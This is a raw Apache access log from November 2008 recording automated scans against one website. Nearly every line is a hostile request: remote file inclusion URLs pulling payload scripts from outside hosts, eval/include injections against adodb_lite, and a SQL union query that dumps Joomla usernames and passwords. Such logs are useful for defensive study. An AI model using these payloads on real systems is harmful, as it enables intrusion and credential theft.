203.86.233.109 - - [09/Nov/2008:16:49:22 -0800] "GET /logs/access.log/oneadmin/photogallery/include.php?path[docroot]=http://www.tortuga-finance.com/includes/.../on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
203.86.233.109 - - [09/Nov/2008:16:49:23 -0800] "GET /oneadmin/photogallery/include.php?path[docroot]=http://www.tortuga-finance.com/includes/.../on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
203.86.233.109 - - [09/Nov/2008:16:49:24 -0800] "GET /logs/oneadmin/photogallery/include.php?path[docroot]=http://www.tortuga-finance.com/includes/.../on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
203.86.233.109 - - [09/Nov/2008:16:51:14 -0800] "GET /oneadmin/photogallery/include.php?path[docroot]=http://www.tortuga-finance.com/includes/.../on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
209.85.108.8 - - [09/Nov/2008:16:52:20 -0800] "GET /logs/access.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.geocities.com/aank44/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
209.85.108.8 - - [09/Nov/2008:16:52:20 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.geocities.com/aank44/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
209.85.108.8 - - [09/Nov/2008:16:52:21 -0800] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.geocities.com/aank44/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
88.80.202.189 - - [09/Nov/2008:16:52:47 -0800] "GET /logs/access.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.geocities.com/aank44/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
88.80.202.189 - - [09/Nov/2008:16:52:47 -0800] "GET /logs/access.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.geocities.com/aank44/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
88.80.202.189 - - [09/Nov/2008:16:52:47 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.geocities.com/aank44/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
88.80.202.189 - - [09/Nov/2008:16:52:47 -0800] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.geocities.com/aank44/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
88.80.202.189 - - [09/Nov/2008:16:52:52 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.geocities.com/aank44/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
88.80.202.189 - - [09/Nov/2008:16:52:52 -0800] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.geocities.com/aank44/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
209.85.108.8 - - [09/Nov/2008:16:52:56 -0800] "GET /logs/access_080825.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.geocities.com/aank44/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
209.85.108.8 - - [09/Nov/2008:16:52:56 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://www.geocities.com/aank44/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
209.85.108.8 - - [09/Nov/2008:16:52:56 -0800] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.geocities.com/aank44/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
80.247.76.180 - - [09/Nov/2008:16:53:07 -0800] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://62.141.54.164/.file/ghx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
85.114.133.156 - - [09/Nov/2008:16:53:18 -0800] "GET /logs/access_080825.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://thaisfantasias.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
85.114.133.156 - - [09/Nov/2008:16:53:18 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://thaisfantasias.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
85.114.133.156 - - [09/Nov/2008:16:53:18 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://thaisfantasias.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
80.67.20.101 - - [09/Nov/2008:16:54:41 -0800] "GET /logs/access_080804.log/lostpasswd.php?env[include_prefix]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.vspeaking.com"
80.67.23.90 - - [09/Nov/2008:16:54:52 -0800] "GET /logs/access_080804.log/lostpasswd.php?env[include_prefix]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.vspeaking.com"
80.67.22.215 - - [09/Nov/2008:16:55:19 -0800] "GET /logs/access_080804.log/lostpasswd.php?env[include_prefix]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.vspeaking.com"
62.24.103.66 - - [09/Nov/2008:16:56:41 -0800] "GET /logs/access.log//webi/////errors.php?error=http://www.hfilm.co.kr/bbs/info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
62.24.103.66 - - [09/Nov/2008:16:56:46 -0800] "GET /webi/////errors.php?error=http://www.hfilm.co.kr/bbs/info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
62.24.103.66 - - [09/Nov/2008:16:56:50 -0800] "GET /logs//webi/////errors.php?error=http://www.hfilm.co.kr/bbs/info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
89.111.176.53 - - [09/Nov/2008:16:58:53 -0800] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
89.111.176.53 - - [09/Nov/2008:16:58:53 -0800] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
74.6.22.169 - - [09/Nov/2008:16:59:27 -0800] "GET /logs/access_080602.log HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.vspeaking.com"
200.68.95.210 - - [09/Nov/2008:17:00:40 -0800] "GET /logs/access_080804.log//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://face.kapanlagi.com/album/PhotoAlbum/galeri/album1212/bot/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.vspeaking.com"
200.68.95.210 - - [09/Nov/2008:17:00:48 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://face.kapanlagi.com/album/PhotoAlbum/galeri/album1212/bot/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.vspeaking.com"
200.68.95.210 - - [09/Nov/2008:17:00:50 -0800] "GET /logs//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://face.kapanlagi.com/album/PhotoAlbum/galeri/album1212/bot/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.vspeaking.com"
212.97.132.101 - - [09/Nov/2008:17:01:44 -0800] "GET /index.php?option=com_pccookbook&page=viewuserrecipes&user_id=-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/* HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.vspeaking.com"
212.97.132.101 - - [09/Nov/2008:17:01:44 -0800] "GET /logs/index.php?option=com_pccookbook&page=viewuserrecipes&user_id=-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/* HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.vspeaking.com"
212.97.132.101 - - [09/Nov/2008:17:01:44 -0800] "GET /logs/access.log/index.php?option=com_pccookbook&page=viewuserrecipes&user_id=-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/* HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.vspeaking.com"
190.41.11.250 - - [09/Nov/2008:17:02:30 -0800] "GET /logs/access_080804.log/lostpasswd.php?env[include_prefix]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
206.221.179.200 - - [09/Nov/2008:17:05:04 -0800] "GET /phphtml.php?htmlclass_path=http://www.womabkr.com.tw/appserv/de.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
80.247.76.180 - - [09/Nov/2008:17:06:04 -0800] "GET /logs/access.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://62.141.54.164/.file/ghx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
80.247.76.180 - - [09/Nov/2008:17:06:04 -0800] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://62.141.54.164/.file/ghx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
80.247.76.180 - - [09/Nov/2008:17:06:05 -0800] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://62.141.54.164/.file/ghx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
206.221.179.200 - - [09/Nov/2008:17:07:25 -0800] "GET /logs/access.log/phphtml.php?htmlclass_path=http://www.womabkr.com.tw/appserv/de.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
206.221.179.200 - - [09/Nov/2008:17:07:25 -0800] "GET /phphtml.php?htmlclass_path=http://www.womabkr.com.tw/appserv/de.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
206.221.179.200 - - [09/Nov/2008:17:07:25 -0800] "GET /logs/phphtml.php?htmlclass_path=http://www.womabkr.com.tw/appserv/de.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
202.60.64.194 - - [09/Nov/2008:17:09:25 -0800] "GET /logs/access_080901.log/errors.php?error=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
202.60.64.194 - - [09/Nov/2008:17:09:25 -0800] "GET /errors.php?error=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
202.60.64.194 - - [09/Nov/2008:17:09:26 -0800] "GET /logs/errors.php?error=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
202.60.64.194 - - [09/Nov/2008:17:10:27 -0800] "GET /logs/access_080915.log/errors.php?error=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
24.67.0.44 - - [09/Nov/2008:17:11:42 -0800] "GET /logs/access_080804.log/lostpasswd.php?env[include_prefix]=http://www.noertershausen.de/event/id_jaheem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
24.67.0.44 - - [09/Nov/2008:17:11:42 -0800] "GET /logs/access_080804.log/lostpasswd.php?env[include_prefix]=http://www.noertershausen.de/event/id_jaheem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
212.97.132.101 - - [09/Nov/2008:17:11:47 -0800] "GET /logs/access_080804.log/index.php?option=com_pccookbook&page=viewuserrecipes&user_id=-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/* HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.vspeaking.com"
89.218.85.18 - - [09/Nov/2008:17:12:03 -0800] "GET /logs/access_080825.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.geocities.com/aank44/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
89.218.85.18 - - [09/Nov/2008:17:12:03 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://www.geocities.com/aank44/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
59.125.96.13 - - [09/Nov/2008:17:12:04 -0800] "GET /logs/access.log//?path%5Bdocroot%5D=http://fantalaranja.t35.com/id44.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
59.125.96.13 - - [09/Nov/2008:17:12:06 -0800] "GET /?path%5Bdocroot%5D=http://fantalaranja.t35.com/id44.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.79" "www.vspeaking.com"
89.218.85.18 - - [09/Nov/2008:17:12:07 -0800] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.geocities.com/aank44/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
59.125.96.13 - - [09/Nov/2008:17:12:08 -0800] "GET /logs//?path%5Bdocroot%5D=http://fantalaranja.t35.com/id44.txt?? HTTP/1.1" 200 2373 "-" "libwww-perl/5.79" "www.vspeaking.com"
66.230.194.41 - - [09/Nov/2008:17:14:41 -0800] "GET /logs/access.log//components/errors.php?error=http://www.talleressanxenxo.com/templates/.guardian/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
66.230.194.41 - - [09/Nov/2008:17:14:41 -0800] "GET /components/errors.php?error=http://www.talleressanxenxo.com/templates/.guardian/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
66.230.194.41 - - [09/Nov/2008:17:14:41 -0800] "GET /logs//components/errors.php?error=http://www.talleressanxenxo.com/templates/.guardian/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
59.125.96.13 - - [09/Nov/2008:17:15:20 -0800] "GET /logs/access_080804.log//?path%5Bdocroot%5D=http://fantalaranja.t35.com/id44.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
65.38.105.213 - - [09/Nov/2008:17:16:51 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://members.lycos.co.uk/sider007/ideex.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.vspeaking.com"
65.38.105.213 - - [09/Nov/2008:17:18:25 -0800] "GET /logs/access.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://members.lycos.co.uk/sider007/ideex.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.vspeaking.com"
65.38.105.213 - - [09/Nov/2008:17:18:25 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://members.lycos.co.uk/sider007/ideex.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.vspeaking.com"
65.38.105.213 - - [09/Nov/2008:17:18:25 -0800] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://members.lycos.co.uk/sider007/ideex.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.vspeaking.com"
80.247.76.180 - - [09/Nov/2008:17:19:31 -0800] "GET /logs/access_080901.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://62.141.54.164/.file/ghx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
200.68.95.210 - - [09/Nov/2008:17:23:03 -0800] "GET /logs/access_080804.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://waktu.hut2.ru/irc/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.vspeaking.com"
200.68.95.210 - - [09/Nov/2008:17:23:03 -0800] "GET /logs/access_080804.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://waktu.hut2.ru/irc/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.vspeaking.com"
216.70.72.201 - - [09/Nov/2008:17:23:11 -0800] "GET /logs/access.log//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.woonwinkel-zevenaar.nl/components/com_user/pulaid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.vspeaking.com"
216.70.72.201 - - [09/Nov/2008:17:23:11 -0800] "GET /ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.woonwinkel-zevenaar.nl/components/com_user/pulaid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.vspeaking.com"
216.70.72.201 - - [09/Nov/2008:17:23:11 -0800] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.woonwinkel-zevenaar.nl/components/com_user/pulaid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.vspeaking.com"
217.75.203.10 - - [09/Nov/2008:17:23:46 -0800] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.asa.ba/eng/administrator/components/com_chronocontact/excelwriter/Writer/poiid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.vspeaking.com"
217.75.203.10 - - [09/Nov/2008:17:23:46 -0800] "GET /ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.asa.ba/eng/administrator/components/com_chronocontact/excelwriter/Writer/poiid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.vspeaking.com"
217.75.203.10 - - [09/Nov/2008:17:24:34 -0800] "GET /logs/access.log//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.asa.ba/eng/administrator/components/com_chronocontact/excelwriter/Writer/poiid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.vspeaking.com"
89.111.176.122 - - [09/Nov/2008:17:26:03 -0800] "GET /logs/access.log/errors.php?error=http://www.jjran.com/board/skin/zero_vote/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
89.111.176.122 - - [09/Nov/2008:17:26:04 -0800] "GET /errors.php?error=http://www.jjran.com/board/skin/zero_vote/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
89.111.176.122 - - [09/Nov/2008:17:26:04 -0800] "GET /logs/errors.php?error=http://www.jjran.com/board/skin/zero_vote/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
70.84.182.98 - - [09/Nov/2008:17:27:20 -0800] "GET /ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.woonwinkel-zevenaar.nl/components/com_user/pulaid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.vspeaking.com"
70.84.182.98 - - [09/Nov/2008:17:27:24 -0800] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.woonwinkel-zevenaar.nl/components/com_user/pulaid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.vspeaking.com"
70.84.182.98 - - [09/Nov/2008:17:27:24 -0800] "GET /logs/access.log//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.woonwinkel-zevenaar.nl/components/com_user/pulaid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.vspeaking.com"
89.111.176.122 - - [09/Nov/2008:17:27:26 -0800] "GET /errors.php?error=http://www.jjran.com/board/skin/zero_vote/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
206.221.179.200 - - [09/Nov/2008:17:27:34 -0800] "GET /logs/access.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.womabkr.com.tw/appserv/de.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
206.221.179.200 - - [09/Nov/2008:17:27:34 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.womabkr.com.tw/appserv/de.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
206.221.179.200 - - [09/Nov/2008:17:27:35 -0800] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.womabkr.com.tw/appserv/de.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
209.85.108.8 - - [09/Nov/2008:17:28:32 -0800] "GET /logs/access_080804.log//components/com_flyspray/startdown.php?file=http://www.geocities.com/aank44/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
209.85.108.8 - - [09/Nov/2008:17:28:32 -0800] "GET /components/com_flyspray/startdown.php?file=http://www.geocities.com/aank44/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
209.85.108.8 - - [09/Nov/2008:17:28:33 -0800] "GET /logs//components/com_flyspray/startdown.php?file=http://www.geocities.com/aank44/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
88.80.202.189 - - [09/Nov/2008:17:28:56 -0800] "GET /logs/access_080804.log//components/com_flyspray/startdown.php?file=http://www.geocities.com/aank44/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
88.80.202.189 - - [09/Nov/2008:17:28:56 -0800] "GET /components/com_flyspray/startdown.php?file=http://www.geocities.com/aank44/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
88.80.202.189 - - [09/Nov/2008:17:28:56 -0800] "GET /logs//components/com_flyspray/startdown.php?file=http://www.geocities.com/aank44/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
88.80.202.189 - - [09/Nov/2008:17:28:57 -0800] "GET /logs/access_080804.log//components/com_flyspray/startdown.php?file=http://www.geocities.com/aank44/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
88.80.202.189 - - [09/Nov/2008:17:28:57 -0800] "GET /components/com_flyspray/startdown.php?file=http://www.geocities.com/aank44/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
88.80.202.189 - - [09/Nov/2008:17:28:57 -0800] "GET /logs//components/com_flyspray/startdown.php?file=http://www.geocities.com/aank44/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
190.196.2.205 - - [09/Nov/2008:17:29:29 -0800] "GET /logs/access_080804.log/lostpasswd.php?env[include_prefix]=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
203.152.222.4 - - [09/Nov/2008:17:29:37 -0800] "GET /index.php?DOCUMENT_ROOT=http://www.asa.ba/eng/administrator/components/com_admin/poiid.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
203.152.222.4 - - [09/Nov/2008:17:29:37 -0800] "GET /logs/access_080901.log/index.php?DOCUMENT_ROOT=http://www.asa.ba/eng/administrator/components/com_admin/poiid.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
203.152.222.4 - - [09/Nov/2008:17:29:37 -0800] "GET /logs/index.php?DOCUMENT_ROOT=http://www.asa.ba/eng/administrator/components/com_admin/poiid.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
203.152.222.4 - - [09/Nov/2008:17:29:38 -0800] "GET /logs/access_080915.log/index.php?DOCUMENT_ROOT=http://www.asa.ba/eng/administrator/components/com_admin/poiid.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
89.111.176.122 - - [09/Nov/2008:17:31:13 -0800] "GET //vwar/backup/errors.php?error=http://www.jjran.com/board/skin/zero_vote/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
89.111.176.122 - - [09/Nov/2008:17:34:59 -0800] "GET /logs/access.log///vwar/backup/errors.php?error=http://www.jjran.com/board/skin/zero_vote/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
89.111.176.122 - - [09/Nov/2008:17:34:59 -0800] "GET //vwar/backup/errors.php?error=http://www.jjran.com/board/skin/zero_vote/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
89.111.176.122 - - [09/Nov/2008:17:35:00 -0800] "GET /logs///vwar/backup/errors.php?error=http://www.jjran.com/board/skin/zero_vote/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
89.111.176.122 - - [09/Nov/2008:17:35:42 -0800] "GET /logs/access.log/errors.php?error=http://www.jjran.com/board/skin/zero_vote/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.vspeaking.com"
89.111.176.122 - - [09/Nov/2008:17:35:43 -0800] "GET /errors.php?error=http://www.jjran.com/board/skin/zero_vote/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.vspeaking.com"
89.111.176.122 - - [09/Nov/2008:17:35:43 -0800] "GET /logs/errors.php?error=http://www.jjran.com/board/skin/zero_vote/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.vspeaking.com"
70.84.182.98 - - [09/Nov/2008:17:36:35 -0800] "GET /logs/access.log%22%20class=%22neww%22%20target=%22_blank%22%20title=%22Im%20neuen%20Fenster%20öffnen//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.woonwinkel-zevenaar.nl/components/com_user/pulaid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.vspeaking.com"
200.101.66.123 - - [09/Nov/2008:17:38:11 -0800] "GET /main.php?x=http://usuarios.lycos.es/qweqwe12/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
200.101.66.123 - - [09/Nov/2008:17:38:11 -0800] "GET /logs/access_080901.log/main.php?x=http://usuarios.lycos.es/qweqwe12/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
200.101.66.123 - - [09/Nov/2008:17:38:11 -0800] "GET /logs/access_080915.log/main.php?x=http://usuarios.lycos.es/qweqwe12/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
200.101.66.123 - - [09/Nov/2008:17:38:11 -0800] "GET /logs/main.php?x=http://usuarios.lycos.es/qweqwe12/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
65.38.105.213 - - [09/Nov/2008:17:39:26 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://members.lycos.co.uk/sider007/ideex.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.vspeaking.com"
65.38.105.213 - - [09/Nov/2008:17:41:05 -0800] "GET /logs/access.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://members.lycos.co.uk/sider007/ideex.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.vspeaking.com"
